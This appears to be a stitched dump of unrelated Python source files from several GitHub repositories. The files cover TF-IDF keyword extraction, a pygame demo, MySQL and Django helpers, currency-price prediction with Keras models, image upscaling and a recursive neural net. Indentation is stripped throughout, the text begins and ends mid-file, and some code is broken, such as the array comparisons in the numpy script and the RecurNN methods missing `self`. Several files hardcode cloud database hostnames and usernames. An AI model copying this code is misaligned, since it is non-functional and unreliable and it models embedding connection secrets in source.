#generate tf-idf for the given document
tf_idf_vector=tfidf_transformer.transform(cv.transform([doc]))
#Function for sorting tf_idf in descending order
from scipy.sparse import coo_matrix
def sort_coo(coo_matrix):
tuples = zip(coo_matrix.col, coo_matrix.data)
return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)
def extract_topn_from_vector(feature_names, sorted_items, topn=10):
"""get the feature names and tf-idf score of top n items"""
#use only topn items from vector
sorted_items = sorted_items[:topn]
score_vals = []
feature_vals = []
# word index and corresponding tf-idf score
for idx, score in sorted_items:
#keep track of feature name and its corresponding score
score_vals.append(round(score, 3))
feature_vals.append(feature_names[idx])
#create a tuples of feature,score
#results = zip(feature_vals,score_vals)
results= {}
for idx in range(len(feature_vals)):
results[feature_vals[idx]]=score_vals[idx]
return results
#sort the tf-idf vectors by descending order of scores
sorted_items=sort_coo(tf_idf_vector.tocoo())
#extract only the top n; n here is 10
keywords=extract_topn_from_vector(feature_names,sorted_items, 10)
import json
export = {
"text": doc,
"keywords": list(keywords.keys())
}
app_json = json.dumps(export)
print(app_json)
``` |
{
"source": "2011zizak22/pong",
"score": 3
} |
#### File: 2011zizak22/pong/simple_game.py
```python
import sys
import pygame as pg
class Enemy(pg.sprite.Sprite):
def __init__(self, centerpoint, *groups):
super(Enemy, self).__init__(*groups)
self.rect = pg.Rect(0, 0, 64, 64)
self.rect.center = centerpoint
self.pos = self.rect.center
self.image = pg.Surface(self.rect.size)
self.image.fill(pg.Color("dodgerblue"))
self.speed = .1
def move(self, dt):
self.pos = self.pos[0] + (self.speed * dt), self.pos[1]
self.rect.center = self.pos
def update(self, dt):
self.move(dt)
def draw(self, surface):
surface.blit(self.image, self.rect)
class Game(object):
def __init__(self):
self.done = False
self.screen = pg.display.set_mode((1280, 720))
self.screen_rect =self.screen.get_rect()
self.fps = 60
self.clock = pg.time.Clock()
self.spawn_timer = 0
self.spawn_frequency = 3000 #milliseconds
self.enemies = pg.sprite.Group()
def event_loop(self):
for event in pg.event.get():
if event.type == pg.QUIT:
self.done = True
def update(self, dt):
self.spawn_timer += dt
if self.spawn_timer >= self.spawn_frequency:
print("SPAWN")
self.spawn_timer -= self.spawn_frequency
Enemy(self.screen_rect.center, self.enemies)
self.enemies.update(dt)
def draw(self):
self.screen.fill(pg.Color("gray10"))
self.enemies.draw(self.screen)
def run(self):
while not self.done:
dt = self.clock.tick(self.fps)
self.event_loop()
self.update(dt)
self.draw()
pg.display.update()
if __name__ == "__main__":
game = Game()
game.run()
pg.quit()
sys.exit()
``` |
{
"source": "201213580/midescuentogt",
"score": 3
} |
#### File: midescuentogt/servidor/conexiones.py
```python
import MySQLdb
def consultaRecuperar(consulta):
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
cursor.execute(consulta)
#cnx.close() no se cierra porque activa una excepcion.
return cursor
def consultaSQL(consulta):
respuesta=False
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
cursor.execute(consulta)
respuesta=cursor.fetchone()
if respuesta=='1':
respuesta=True
cnx.close()
return respuesta
def consultaId(consulta):
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
cursor.execute(consulta)
respuesta=cursor.fetchone()
#cnx.close()
return respuesta
def consultaPromociones(consulta):
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
try:
cursor.execute(consulta)
#cnx.close() no se cierra porque activa una excepcion.
except Exception, e:
print ' '
return cursor
def registroSQL(consulta):
respuesta=False
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
try:
cursor.execute(consulta)
cnx.commit()
cnx.close()
respuesta=True
except Exception, e:
print 'No se logro realizar la accion'
return respuesta
def consultaCodigo(consulta):
respuesta=False
cnx = MySQLdb.connect(host='micupongt.cjyaceyawgbr.us-east-2.rds.amazonaws.com', user='manuel13580', passwd='<PASSWORD>-',
db='micupongt')
cursor = cnx.cursor()
try:
cursor.execute(consulta)
cnx.commit()
respuesta=cursor.fetchone()
#cnx.close() no se cierra porque activa una excepcion.
except Exception, e:
print ' '
return respuesta
``` |
{
"source": "2012-cevp/Proyecto-de-pre-grado-Udec",
"score": 3
} |
#### File: 2012-cevp/Proyecto-de-pre-grado-Udec/conexion_bd.py
```python
from mysql import *
from mysql.connector import pooling
import sys
class Conexion:
_DATABASE = 'bqifo1pz07m1cxqswphy'
_USERNAME = 'uqqvf5c2n9ccrnrv'
_PASSWORD = '<PASSWORD>'
_DB_PORT = '21374'
_HOST = 'bqifo1pz07m1cxqswphy-mysql.services.clever-cloud.com'
_MAX_CON = 5
_pool = None
@classmethod
def obtenerPool(cls):
if cls._pool is None:
try:
#Aqui estaba el error faltaba un .
cls._pool = pooling.MySQLConnectionPool(pool_name='mypool',
pool_size=cls._MAX_CON,
host=cls._HOST,
user=cls._USERNAME,
password=<PASSWORD>,
port=cls._DB_PORT,
database=cls._DATABASE)
#log.debug(f'Creación del pool exitoso: {cls._pool}')
return cls._pool
except Exception as e:
#log.error(f'Ocurrio un problema al obtener el pool de conexiones {e}')
sys.exit()
else:
return cls._pool
@classmethod
def obtenerConexion(cls):
conexion = cls.obtenerPool().get_connection()
#log.debug(f'Conexión establecida exitosamente: {conexion}')
return conexion
@classmethod
def liberarConexion(cls, conexion):
conexion.close()
#log.debug(f'Liberando la conexión exitosamente: {conexion}')
@classmethod
def cerrarConexion(cls):
cls.obtenerPool().closeall()
```
#### File: 2012-cevp/Proyecto-de-pre-grado-Udec/conexion_insertar.py
```python
from cursor_pool import CursorDelPool
class Transacciones():
_INSERTAR_BTC = f'INSERT INTO bitcoin (`Fecha`, `Precio`, `Prediccion`,`Prediccion_sig`) VALUES (%s, %s, %s, %s)'
_INSERTAR_USD = 'INSERT INTO dolar (`Fecha`, `Precio`, `Prediccion`, `Prediccion_sig`) VALUES (%s, %s, %s, %s)'
_INSERTAR_EUR = 'INSERT INTO euro (`Fecha`, `Precio`, `Prediccion`, `Prediccion_sig`) VALUES (%s, %s, %s, %s)'
#_SELECT_BTC = f'SELECT * FROM moneda.bitcoin ORDER BY idbitcoin LIMIT 2'
_SELECT_BTC = f'SELECT DATE_FORMAT(Fecha, "%Y-%m-%d %H:%i:%S"), Precio, Prediccion, Prediccion_sig FROM bitcoin ORDER BY idbitcoin DESC LIMIT 4'
_SELECT_USD = f'SELECT DATE_FORMAT(Fecha, "%Y-%m-%d"), Precio, Prediccion, Prediccion_sig FROM dolar ORDER BY iddolar DESC LIMIT 5'
_SELECT_EUR = f'SELECT DATE_FORMAT(Fecha, "%Y-%m-%d"), Precio, Prediccion, Prediccion_sig FROM euro ORDER BY ideuro DESC LIMIT 4'
@classmethod
def insertar_btc(cls, Fecha, Precio, Prediccion, Prediccion_sig):
with CursorDelPool() as cursor:
valores = (Fecha, Precio, Prediccion, Prediccion_sig)
cursor.execute(cls._INSERTAR_BTC, valores)
return cursor.rowcount
@classmethod
def insertar_usd(cls, Fecha, Precio, Prediccion, Prediccion_sig):
with CursorDelPool() as cursor:
valores = (Fecha, Precio, Prediccion, Prediccion_sig)
cursor.execute(cls._INSERTAR_USD, valores)
return cursor.rowcount
@classmethod
def insertar_eur(cls, Fecha, Precio, Prediccion, Prediccion_sig):
with CursorDelPool() as cursor:
valores = (Fecha, Precio, Prediccion, Prediccion_sig)
cursor.execute(cls._INSERTAR_EUR, valores)
return cursor.rowcount
@classmethod
def seleccionar_btc(cls):
with CursorDelPool() as cursor:
cursor.execute(cls._SELECT_BTC)
registros = cursor.fetchall()
precios = []
fechas = []
prediccion_bitcoin = []
prediccion_siguiente_btc = []
for registro in registros:
fecha = registro[0]
precio = registro[1]
prediccion = registro[2]
prediccion_sig_btc = registro[3]
precios.append(precio)
fechas.append(fecha)
prediccion_bitcoin.append(prediccion)
prediccion_siguiente_btc.append(prediccion_sig_btc)
return list(reversed(precios)), list(reversed(fechas)), list(reversed(prediccion_bitcoin)), list(reversed(prediccion_siguiente_btc))
@classmethod
def seleccionar_usd(cls):
with CursorDelPool() as cursor:
cursor.execute(cls._SELECT_USD)
registros = cursor.fetchall()
precios_dolar = []
fechas_dolar = []
prediccion_dolar = []
prediccion_siguiente_dolar = []
for registro in registros:
fecha = registro[0]
precio = registro[1]
prediccion = registro[2]
prediccion_sig_usd = registro[3]
precios_dolar.append(precio)
fechas_dolar.append(fecha)
prediccion_dolar.append(prediccion)
prediccion_siguiente_dolar.append(prediccion_sig_usd)
return list(reversed(precios_dolar)), list(reversed(fechas_dolar)), list(reversed(prediccion_dolar)), list(reversed(prediccion_siguiente_dolar))
@classmethod
def seleccionar_eur(cls):
with CursorDelPool() as cursor:
cursor.execute(cls._SELECT_EUR)
registros = cursor.fetchall()
precios_euro = []
fechas_euro = []
prediccion_euro = []
prediccion_siguiente_euro = []
for registro in registros:
fecha = registro[0]
precio = registro[1]
prediccion = registro[2]
pred_sig_eur = registro[3]
precios_euro.append(precio)
fechas_euro.append(fecha)
prediccion_euro.append(prediccion)
prediccion_siguiente_euro.append(pred_sig_eur)
return list(reversed(precios_euro)), list(reversed(fechas_euro)), list(reversed(prediccion_euro)), list(reversed(prediccion_siguiente_euro))
```
#### File: 2012-cevp/Proyecto-de-pre-grado-Udec/insertar_datos_menu.py
```python
import time
import threading
import datetime
from monedas import Monedas_Peticiones
from conexion_insertar import Transacciones
from modelos import modeloBitcoin, modeloEuro, modeloDolar
import numpy as np
# Traemos el escalador y la carga del modelo del bitcoin, esto a traves de la instancia a la clase de modeloBitcoin()
escalador_btc, modelo_btc = modeloBitcoin()
escalador_euro, modelo_euro = modeloEuro()
escalador_dolar, modelo_dolar = modeloDolar()
def hora(segundos):
while True:
# Definiendo la hora de inserción de los datos
#hora = datetime.datetime.now()
# los formatos para el Dolar y el Euro estan en [año - mes - día]
# y para el Bitcoin en formato [Año-mes-día Hora:minuto:segundo]
hora_dol_eur = datetime.datetime.now().strftime('%Y-%m-%d')
hora_btc = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
return hora_dol_eur, hora_btc
time.sleep(segundos)
def demora_btc(segundos):
while True:
# Hacemos el web scraping para el valor del bitcoin
btc = Monedas_Peticiones.precio_btc()
# Traigo los valores, como en este caso se retornan varios elementos, entonces le dire que solo me traiga el primer valor del return
valores = Transacciones.seleccionar_btc()[0]
# Reasginamos las dimensiones de la lista que tenemos en valores
valores = np.reshape(valores, (-1, 1))
valores = escalador_btc.fit_transform(valores)
valores = valores.reshape(1, len(valores), 1)
prediccion = modelo_btc.predict(valores)
prediccion_desescalada = escalador_btc.inverse_transform(prediccion)
prediccion_btc = round(float(prediccion_desescalada), 2)
# Prediccion siguiente hora
val_siguiente = Transacciones.seleccionar_btc()[0]
val_siguiente.append(btc)
val_siguiente = val_siguiente[1:]
val_siguiente = np.reshape(val_siguiente, (-1, 1))
valor_escalado = escalador_btc.fit_transform(val_siguiente)
valor_escalado = valor_escalado.reshape(1, len(val_siguiente), 1)
prediccion_sig = modelo_btc.predict(valor_escalado)
prediccion_desescalada_sig = escalador_btc.inverse_transform(
prediccion_sig)
prediccion_def_sig = round(int(prediccion_desescalada_sig), 2)
# Insertamos nuestras datos, en este caso traigo la hora, pero como no quiero que tenga un tiempo de pausa, simplemente
# le pasamos el parametro None, como tambien se quiere tener la hora para el bitcoin entonces se trae la posición[1] del return que es hora_btc
insertando_btc = Transacciones.insertar_btc(
hora(None)[1], btc, prediccion_btc, prediccion_def_sig)
time.sleep(segundos)
def demora_usd(segundos):
while True:
usd = Monedas_Peticiones.precio_dolar()
valores_usd = Transacciones.seleccionar_usd()[0]
valores_usd = np.reshape(valores_usd, (-1,1))
valores_usd = escalador_dolar.fit_transform(valores_usd)
valores_usd = valores_usd.reshape(1, len(valores_usd),1)
#PREDICCION USD
prediccion_usd = modelo_dolar.predict(valores_usd)
prediccion_desescalada_usd = escalador_dolar.inverse_transform(prediccion_usd)
prediccion_usd = round(float(prediccion_desescalada_usd), 2)
#PREDICCIÓN SIGUIENTE DIA
val_siguiente = Transacciones.seleccionar_usd()[0]
val_siguiente.append(usd)
val_siguiente = val_siguiente[1:]
val_siguiente = np.reshape(val_siguiente, (-1,1))
valor_escalado = escalador_dolar.fit_transform(val_siguiente)
valor_escalado = valor_escalado.reshape(1, len(val_siguiente), 1)
prediccion_sig = modelo_dolar.predict(valor_escalado)
prediccion_desescalada_sig = escalador_dolar.inverse_transform(prediccion_sig)
prediccion_def_sig = round(float(prediccion_desescalada_sig), 2)
insertando_dolar = Transacciones.insertar_usd(hora(None)[0], usd, prediccion_usd, prediccion_def_sig)
time.sleep(segundos)
def demora_eur(segundos):
while True:
eur = Monedas_Peticiones.precio_euro()
valores_eur = Transacciones.seleccionar_eur()[0]
# Reasginamos las dimensiones de la lista que tenemos en valores
valores_eur = np.reshape(valores_eur, (-1, 1))
valores_eur = escalador_euro.fit_transform(valores_eur)
valores_eur = valores_eur.reshape(1, len(valores_eur), 1)
# Prediccion EUR
prediccion_eur = modelo_euro.predict(valores_eur)
prediccion_desescalada_eur = escalador_euro.inverse_transform(prediccion_eur)
prediccion_eur = round(float(prediccion_desescalada_eur), 2)
# Prediccion siguiente dia
val_siguiente = Transacciones.seleccionar_eur()[0]
val_siguiente.append(eur)
val_siguiente = val_siguiente[1:]
val_siguiente = np.reshape(val_siguiente, (-1, 1))
valor_escalado = escalador_euro.fit_transform(val_siguiente)
valor_escalado = valor_escalado.reshape(1, len(val_siguiente), 1)
prediccion_sig = modelo_euro.predict(valor_escalado)
prediccion_desescalada_sig = escalador_euro.inverse_transform( prediccion_sig)
prediccion_def_sig = round(float(prediccion_desescalada_sig), 2)
insertando_eur = Transacciones.insertar_eur(hora(None)[0], eur, prediccion_eur, prediccion_def_sig)
time.sleep(segundos)
# Aqui creamos el hilo.
# El primer argumento es el nombre de la funcion que contiene el codigo.
# El segundo argumento es una lista de argumentos para esa funcion, es importante poner una , al fin ya que asume una lista de argumentos (siempre debe quedar así)
hilo_hora = threading.Thread(target=hora, args=(3600,))
hilo_btc = threading.Thread(target=demora_btc, args=(3600,))
hilo_usd = threading.Thread(target=demora_usd, args=(86400,))
hilo_eur = threading.Thread(target=demora_eur, args=(86450,))
# Iniciando el hilo que queremos ejecutar
hilo_hora.start()
hilo_btc.start()
hilo_usd.start()
hilo_eur.start()
```
#### File: 2012-cevp/Proyecto-de-pre-grado-Udec/modelos.py
```python
import pickle
from keras.models import load_model
import numpy as np
from conexion_insertar import Transacciones
def load_object(filename):
with open(''+filename ,'rb') as f:
loaded = pickle.load(f)
return loaded
def modeloBitcoin():
loaded_scaler = load_object('Escalador_bitcoin.pkl')
modelo_btc = load_model('Modelo Bitcoin LSTM.h5')
return loaded_scaler, modelo_btc
def modeloEuro():
load_scaler_eur = load_object('Escalador_euro.pkl')
modelo_eur = load_model('Modelo_euro.h5')
return load_scaler_eur, modelo_eur
def modeloDolar():
load_scaler_dol = load_object('Escalador_dolar.pkl')
modelo_dol = load_model('Modelo_dolar.h5')
return load_scaler_dol, modelo_dol
'''
if __name__ == '__main__':
escalador, modelo = modeloDolar()
valores = Transacciones.seleccionar_usd()[0]
print(valores)
usd = 4050
valores.append(usd)
valores = valores[1:]
print(valores)
valores = np.reshape(valores, (-1,1))
valor_escalado = escalador.fit_transform(valores)
valor_escalado = valor_escalado.reshape(1, len(valores), 1)
print(valor_escalado)
prediccion = modelo.predict(valor_escalado)
prediccion_desescalada = escalador.inverse_transform(prediccion)
prediccion_def = round(int(prediccion_desescalada),2)
print(f'El valor predecido es: {prediccion_def}, tipo de dato: {type(prediccion_def)}')
'''
``` |
{
"source": "2013fangwentao/python_learning",
"score": 4
} |
#### File: python_learning/base/dog.py
```python
class Dog():
def __init__(self, name, age):
self.name = name
self.age = age
def p_name(self):
return self.name
def p_age(self):
print(self.age)
my_dog = Dog('haha', 2)
print(my_dog.name)
print(my_dog.p_name())
my_dog.p_age()
```
#### File: python_learning/base/greeter.py
```python
import pizza
def greet_user(first_name, second_name):
name = {'first name': first_name, 'second name': second_name}
return name
pizza.make_pizza(12, 'haha', 'heheh')
name = greet_user('fang', 'wentao')
print(name)
```
#### File: python_learning/numpy/numpy_io.py
```python
import numpy as np
import matplotlib.pyplot as plt
import sys
import os
POS_INDEX = 5
VEL_INDEX = 8
ATT_INDEX = 11
TIME_INDEX = 2
def plot_residual(time, pos, vel, att, is_save, save_path):
plt.figure(1)
plt.subplot(3, 1, 1)
plt.plot(time, pos[..., 0])
plt.ylabel("x(m)")
plt.subplot(3, 1, 2)
plt.plot(time, pos[..., 1])
plt.ylabel("y(m)")
plt.subplot(3, 1, 3)
plt.plot(time, pos[..., 2])
plt.ylabel("z(m)")
plt.title("pos residual (m)")
plt.grid()
if (is_save):
plt.savefig(os.path.join(save_path, "pos_residual.jpg"))
plt.figure(2)
plt.subplot(3, 1, 1)
plt.plot(time, vel[..., 0])
plt.ylabel("x(m/s)")
plt.subplot(3, 1, 2)
plt.plot(time, vel[..., 1])
plt.ylabel("y(m/s)")
plt.subplot(3, 1, 3)
plt.plot(time, vel[..., 2])
plt.ylabel("z(m/s)")
plt.title("vel residual (m/s)")
plt.grid()
if (is_save):
plt.savefig(os.path.join(save_path, "vel_residual.jpg"))
plt.figure(2)
plt.subplot(3, 1, 1)
plt.plot(time, att[..., 0])
plt.ylabel("x(m/s)")
plt.subplot(3, 1, 2)
plt.plot(time, att[..., 1])
plt.ylabel("y(m/s)")
plt.subplot(3, 1, 3)
plt.plot(time, att[..., 2])
plt.ylabel("z(m/s)")
plt.title("vel residual (deg)")
plt.grid()
if (is_save):
plt.savefig(os.path.join(save_path, "att_residual.jpg"))
plt.show()
def compare(result_file,
truth_file,
start_time=0,
end_time=86400,
is_save_picture=False,
save_path="./"):
result_data = np.loadtxt(result_file)
truth_data = np.loadtxt(truth_file)
data_index = result_data[..., TIME_INDEX] > start_time and result_data[
..., TIME_INDEX] < end_time
refer_index = truth_data[..., TIME_INDEX] > start_time and truth_data[
..., TIME_INDEX] < end_time
data_time = result_data[data_index, TIME_INDEX]
pos_data = result_data[data_index, POS_INDEX:POS_INDEX + 3]
vel_data = result_data[data_index, VEL_INDEX:VEL_INDEX + 3]
att_data = result_data[data_index, ATT_INDEX:ATT_INDEX + 3]
ref_time = truth_data[refer_index, TIME_INDEX]
ref_pos_data = truth_data[refer_index, POS_INDEX:POS_INDEX + 3]
ref_vel_data = truth_data[refer_index, VEL_INDEX:VEL_INDEX + 3]
ref_att_data = truth_data[refer_index, ATT_INDEX:ATT_INDEX + 3]
ref_i = 0
data_i = 0
residual_i = 0
residual_pos = np.nan(pos_data.shape)
residual_vel = np.nan(vel_data.shape)
residual_att = np.nan(att_data.shape)
residual_time = np.nan(ref_time.shape)
while (data_i < np.size(data_time) and ref_i < np.size(ref_time)):
if (np.abs(ref_time[ref_i] - data_time[data_i]) < 5.5e-2):
residual_pos[residual_i, ...] = ref_pos_data[
ref_i, ...] - pos_data[data_i, ...]
residual_vel[residual_i, ...] = ref_vel_data[
ref_i, ...] - vel_data[data_i, ...]
residual_att[residual_i, ...] = ref_att_data[
ref_i, ...] - att_data[data_i, ...]
residual_time[residual_i] = ref_time[ref_i]
''' 角度差异值需要特殊处理一下 '''
if ((residual_att[residual_i, 2]) > 180):
residual_att[residual_i, 2] -= 360
if ((residual_att[residual_i, 2]) < -180):
residual_att[residual_i, 2] += 360
ref_i += 1
data_i += 1
residual_i += 1
elif (ref_time[ref_i] - data_time[data_i] > 0):
data_i += 1
else:
ref_i += 1
residual_pos = residual_pos[~np.isnan(residual_pos)]
residual_vel = residual_vel[~np.isnan(residual_vel)]
residual_att = residual_att[~np.isnan(residual_att)]
pos_mean = np.zeros([3, 3])
vel_mean = np.zeros([3, 3])
att_mean = np.zeros([3, 3])
pos_mean[0, ...] = np.mean(residual_pos)
vel_mean[0, ...] = np.mean(residual_vel)
att_mean[0, ...] = np.mean(residual_att)
pos_mean[1, ...] = np.std(residual_pos)
vel_mean[1, ...] = np.std(residual_vel)
att_mean[1, ...] = np.std(residual_att)
pos_mean[2, ...] = np.sqrt(pos_mean[0, ...] * pos_mean[0, ...] +
pos_mean[1, ...] * pos_mean[1, ...])
vel_mean[2, ...] = np.sqrt(vel_mean[0, ...] * vel_mean[0, ...] +
vel_mean[1, ...] * vel_mean[1, ...])
att_mean[2, ...] = np.sqrt(att_mean[0, ...] * att_mean[0, ...] +
att_mean[1, ...] * att_mean[1, ...])
plot_residual(residual_time, residual_pos, residual_vel, residual_att,
is_save_picture, save_path)
def main():
print("length of argv is %d" % len(sys.argv))
if (len(sys.argv) < 3):
print("参数不足")
return
if (len(sys.argv) == 3):
compare(sys.argv[1], sys.argv[2])
if (len(sys.argv) == 5):
compare(sys.argv[1], sys.argv[2], int(sys.argv[3]), int(sys.argv[4]))
if (len(sys.argv) == 7):
compare(sys.argv[1], sys.argv[2], int(sys.argv[3]), int(sys.argv[4]),
bool(int(sys.argv[5])), sys.argv[6])
if __name__ == "__main__":
main()
``` |
{
"source": "2013ryanleung/Upscaling",
"score": 2
} |
#### File: 2013ryanleung/Upscaling/photo_bulk.py
```python
import os
import cv2
from cv2 import dnn_superres
import matplotlib.pyplot as plt
import numpy as np
import time
def display_img(img,cmap=None):
fig = plt.figure(figsize=(8,8))
ax = fig.add_subplot(111)
ax.imshow(cv2.cvtColor(img,cv2.COLOR_BGR2RGB),cmap)
plt.show()
return
def upscale_img(img,model,x=2):
if model == "edsr":
path = "models/EDSR_x"+str(x)+".pb"
elif model == "espcn":
path = "models/ESPCN_x"+str(x)+".pb"
elif model == "fsrcnn":
path = "models/FSRCNN_x"+str(x)+".pb"
elif model == "lapsrn":
path = "models/LapSRN_x"+str(x)+".pb"
sr = dnn_superres.DnnSuperResImpl_create()
sr.readModel(path)
sr.setModel(model,x)
return sr.upsample(img)
scale = 4
show = True
names = []
direc = os.fsencode("photo_in")
for file in os.listdir(direc):
names.append(os.fsdecode(file))
t0 = time.time()
errlist = []
for i in range(0,len(names)):
path = names[i]
image = cv2.imread("photo_in/"+path)
x,y,c = image.shape
if x*scale > 6000 or y*scale > 6000:
errlist.append((i,names[i]))
continue
upscaled = upscale_img(image,"edsr",scale)
cv2.imwrite("photo_out/"+path[:-4]+"_up.png",upscaled)
if show == True:
plt.figure(figsize=(12,8))
plt.subplot(1,2,1)
plt.imshow(image[:,:,::-1])
plt.subplot(1,2,2)
plt.imshow(upscaled[:,:,::-1])
plt.show()
t1 = time.time()
print("\nElasped time:",np.round(t1-t0,4),"s | ",i+1-len(errlist),"out of",len(names)-len(errlist))
if len(errlist) != 0:
print("\nThe photos below are too large:")
for i in errlist:
print(i)
``` |
{
"source": "201419/PersonalCodeRepository",
"score": 3
} |
#### File: optim/sparsifiedSGD/utils.py
```python
import glob
import os
import pickle
def to_percent(x):
return round(100 * x, 2)
def pickle_it(var, name, directory):
with open(os.path.join(directory, "{}.pickle".format(name)), 'wb') as f:
pickle.dump(var, f)
def unpickle_dir(d):
data = {}
assert os.path.exists(d), "{} does not exists".format(d)
for file in glob.glob(os.path.join(d, '*.pickle')):
name = os.path.basename(file)[:-len('.pickle')]
with open(file, 'rb') as f:
var = pickle.load(f)
data[name] = var
return data
``` |
{
"source": "2014mchidamb/cs3240-f16-team18",
"score": 2
} |
#### File: cs3240-f16-team18/profile/forms.py
```python
from django import forms
from django.contrib.auth.models import User
from crispy_forms.helper import FormHelper
from crispy_forms.layout import Submit
from .models import Group, Profile
class UserForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(UserForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
class Meta:
model = User
fields = ['first_name', 'last_name', 'email']
class ProfileForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(ProfileForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
class Meta:
model = Profile
fields = ['birth_date', 'location', 'bio', 'priv']
class GroupForm(forms.ModelForm):
def __init__(self, *args, **kwargs):
super(GroupForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
class Meta:
model = Group
fields = ['name', 'desc', 'priv']
class AddUserForm(forms.Form):
username = forms.CharField(
label = "Enter Username",
max_length = 50,
required = False,
)
def __init__(self, *args, **kwargs):
super(AddUserForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
class DelUserForm(forms.Form):
user_to_del = forms.CharField(
label = "Enter Username",
max_length = 50,
required = False,
)
def __init__(self, *args, **kwargs):
super(DelUserForm, self).__init__(*args, **kwargs)
self.helper = FormHelper(self)
self.helper.form_tag = False
``` |
{
"source": "2014mchidamb/DeepColorization",
"score": 3
} |
#### File: 2014mchidamb/DeepColorization/deep_colorization.py
```python
from keras.layers import Convolution2D, UpSampling2D
from keras.layers import Activation, Dense, Dropout, Flatten
from keras.layers.normalization import BatchNormalization
from keras.models import Sequential
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img
from skimage.color import rgb2lab, lab2rgb, rgb2gray
from skimage.io import imsave
import numpy as np
import os
import random
import tensorflow as tf
tf.python.control_flow_ops = tf
# Image transformer
datagen = ImageDataGenerator(
rescale=1.0/255,
shear_range=0.2,
zoom_range=0.2,
horizontal_flip=True)
# Get images
X = []
for filename in os.listdir('face_images'):
X.append(img_to_array(load_img('face_images/'+filename)))
X = np.array(X)
# Set up train and test data
split = int(0.9*len(X))
Xtrain = X[:split]
Xtest = rgb2lab(1.0/255*X[split:])[:,:,:,0]
Xtest = Xtest.reshape(Xtest.shape+(1,))
Ytest = rgb2lab(1.0/255*X[split:])[:,:,:,1:]
# Set up model
N = 5
model = Sequential()
num_maps1 = [4, 8, 16, 32, 64]
num_maps2 = [8, 16, 32, 64, 128]
# Convolutional layers
for i in range(N):
if i == 0:
model.add(Convolution2D(num_maps1[i], 3, 3, border_mode='same', subsample=(2, 2), input_shape=(128, 128, 1)))
else:
model.add(Convolution2D(num_maps1[i], 3, 3, border_mode='same', subsample=(2, 2)))
model.add(BatchNormalization())
model.add(Activation('relu'))
model.add(Convolution2D(num_maps2[i], 3, 3, border_mode='same', subsample=(1, 1)))
model.add(BatchNormalization())
model.add(Activation('relu'))
# Upsampling layers
for i in range(N):
model.add(UpSampling2D(size=(2, 2)))
model.add(Convolution2D(num_maps2[-(i+1)], 3, 3, border_mode='same'))
model.add(BatchNormalization())
model.add(Activation('relu'))
if i != N-1:
model.add(Convolution2D(num_maps1[-(i+1)], 3, 3, border_mode='same'))
model.add(BatchNormalization())
model.add(Activation('relu'))
else:
model.add(Convolution2D(2, 3, 3, border_mode='same'))
# Finish model
model.compile(optimizer='rmsprop',
loss='mse')
# Generate training data
batch_size = 10
def image_a_b_gen(batch_size):
for batch in datagen.flow(Xtrain, batch_size=batch_size):
if batch == None:
break
lab_batch = rgb2lab(batch)
X_batch = lab_batch[:,:,:,0]
Y_batch = lab_batch[:,:,:,1:]
yield (X_batch.reshape(X_batch.shape+(1,)), Y_batch)
# Train model
model.fit_generator(
image_a_b_gen(batch_size),
samples_per_epoch=1000,
nb_epoch=15)
# Test model
print model.evaluate(Xtest, Ytest, batch_size=batch_size)
output = model.predict(Xtest)
# Output colorizations
for i in range(len(output)):
cur = np.zeros((128, 128, 3))
cur[:,:,0] = Xtest[i][:,:,0]
cur[:,:,1:] = output[i]
imsave("colorizations/img_"+str(i)+".png", lab2rgb(cur))
imsave("colorizations/img_gray_"+str(i)+".png", rgb2gray(lab2rgb(cur)))
``` |
{
"source": "2014mchidamb/RecursiveRecursiveNets",
"score": 3
} |
#### File: 2014mchidamb/RecursiveRecursiveNets/recurnn.py
```python
from nltk.tokenize import word_tokenize
from torch.autograd import Variable
import csv
import spacy
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
# Set hyperparameters
embed_size = 100
batch_size = 20
l_rate = 0.001
num_epochs = 10
# Read in text data
text_file = open('sentiment_dataset.csv', 'r')
reader = csv.reader(text_file)
data = []
full_text = ''
for line in reader:
data.append(line)
full_text += line[-1]
text_file.close()
# Create vocabulary
word_list = word_tokenize(full_text.lower())
vocab = np.unique(word_list)
vocab_size = len(vocab)
print(vocab_size)
# Create word to index mapping
w_to_i = {word: ind for ind, word in enumerate(vocab)}
# Load text parser
nlp = spacy.load('en')
class RecurNN(nn.Module):
def __init__(self):
super(RecurNN, self).__init__()
self.embeddings = nn.Embedding(vocab_size, embed_size)
self.first_linear = nn.Linear(2*embed_size, embed_size)
self.tanh = nn.Tanh()
self.final_linear = nn.Linear(embed_size, 1)
self.sigmoid = nn.Sigmoid()
def parse(sent):
doc = nlp(sent)
root = doc[0]
for word in doc:
if word.head == word:
root = word
break
return root
def compose(a, b):
ab = torch.cat((a, b), 0)
out = self.first_linear(ab)
out = self.tanh(out)
return out
def compute_vec(root):
lookup = torch.LongTensor([w_to_i[root.text]])
embed_vec = self.embeddings(lookup).view((1, -1))
if len(root.children) == 0:
return embed_vec
vec_list = []
for child in root.children:
vec_list.append(compute_vec(child))
if len(vec_list) == 2:
comp_vec = compose(vec_list[0], vec_list[1])
vec_list.clear()
vec_list.append(comp_vec)
return compose(vec_list[-1], embed_vec)
def forward(self, x):
final_vec = compute_vec(parse(x))
